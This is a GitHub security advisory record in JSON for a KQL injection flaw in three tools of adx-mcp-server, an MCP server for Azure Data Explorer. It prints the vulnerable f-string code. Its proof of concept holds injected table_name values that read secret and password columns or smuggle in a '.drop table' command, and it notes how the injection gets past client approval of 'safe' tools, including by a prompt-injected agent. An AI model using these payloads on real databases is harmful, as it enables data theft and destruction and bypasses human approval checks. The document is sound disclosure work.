{"id":"GHSA-vphc-468g-8rfp","summary":"Azure Data Explorer MCP Server: KQL Injection in multiple tools allows MCP client to execute arbitrary Kusto queries","details":"### Summary\n\nadx-mcp-server (\u003c= latest, commit 48b2933) contains KQL (Kusto Query Language) injection vulnerabilities in three MCP tool handlers: `get_table_schema`, `sample_table_data`, and `get_table_details`. The `table_name` parameter is interpolated directly into KQL queries via f-strings without any validation or sanitization, allowing an attacker (or a prompt-injected AI agent) to execute arbitrary KQL queries against the Azure Data Explorer cluster.\n\n### Details\n\nThe MCP tools construct KQL queries by directly embedding the `table_name` parameter into query strings:\n\n**Vulnerable code** ([permalink](https://github.com/pab1it0/adx-mcp-server/blob/48b2933/src/adx_mcp_server/server.py#L228)):\n\n```python\n@mcp.tool(...)\nasync def get_table_schema(table_name: str) -\u003e List[Dict[str, Any]]:\n    client = get_kusto_client()\n    query = f\"{table_name} | getschema\"          # \u003c-- KQL injection\n    result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def sample_table_data(table_name: str, sample_size: int = 10) -\u003e List[Dict[str, Any]]:\n    client = get_kusto_client()\n    query = f\"{table_name} | sample {sample_size}\"  # \u003c-- KQL injection\n    result_set = client.execute(config.database, query)\n```\n\n```python\n@mcp.tool(...)\nasync def get_table_details(table_name: str) -\u003e List[Dict[str, Any]]:\n    client = get_kusto_client()\n    query = f\".show table {table_name} details\"     # \u003c-- KQL injection\n    result_set = client.execute(config.database, query)\n```\n\nKQL allows chaining query operators with `|` and executing management commands prefixed with `.`. An attacker can inject:\n- `sensitive_table | project Secret, Password | take 100 //` to read arbitrary tables\n- Newline-separated management commands like `.drop table important_data` via `get_table_details`\n- Arbitrary KQL analytics queries via any of the three tools\n\n**Note:** While the server also has an `execute_query` tool that accepts raw KQL by design, the three vulnerable tools are presented as safe metadata-inspection tools. MCP clients may grant automatic access to \"safe\" tools while requiring confirmation for `execute_query`. The injection bypasses this trust boundary.\n\n### PoC\n\n```python\n# PoC: KQL Injection via get_table_schema tool\n# The table_name parameter is injected into: f\"{table_name} | getschema\"\n\nimport json\n\n# MCP tool call that exfiltrates data from a sensitive table\ntool_call = {\n    \"name\": \"get_table_schema\",\n    \"arguments\": {\n        \"table_name\": \"sensitive_data | project Secret, Password | take 100 //\"\n    }\n}\nprint(json.dumps(tool_call, indent=2))\n\n# Resulting KQL: \"sensitive_data | project Secret, Password | take 100 // | getschema\"\n# The // comments out \"| getschema\", executing an arbitrary data query instead\n\n# Destructive example via get_table_details:\ntool_call_destructive = {\n    \"name\": \"get_table_details\",\n    \"arguments\": {\n        \"table_name\": \"users details\\n.drop table critical_data\"\n    }\n}\n# Resulting KQL:\n#   .show table users details\n#   .drop table critical_data details\n```","aliases":["CVE-2026-33980"],"modified":"2026-03-30T20:32:33.257280Z","published":"2026-03-27T19:08:09Z","database_specific":{"severity":"HIGH","github_reviewed_at":"2026-03-27T19:08:09Z","nvd_published_at":"2026-03-27T22:16:22Z","cwe_ids":["CWE-943"],"github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/pab1it0/adx-mcp-server/security/advisories/GHSA-vphc-468g-8rfp"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33980"},{"type":"WEB","url":"https://github.com/pab1it0/adx-mcp-server/commit/0abe0ee55279e111281076393e5e966335fffd30"},{"type":"PACKAGE","url":"https://github.com/pab1it0/adx-mcp-server"}],"affected":[{"package":{"name":"adx-mcp-server","ecosystem":"PyPI","purl":"pkg:pypi/adx-mcp-server"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"1.1.0"}]}],"versions":["0.1.0","1.0.0","1.0.2","1.0.3","1.0.5","1.0.6","1.0.7","1.0.8","1.0.9","1.1.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-vphc-468g-8rfp/GHSA-vphc-468g-8rfp.json"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L"}]}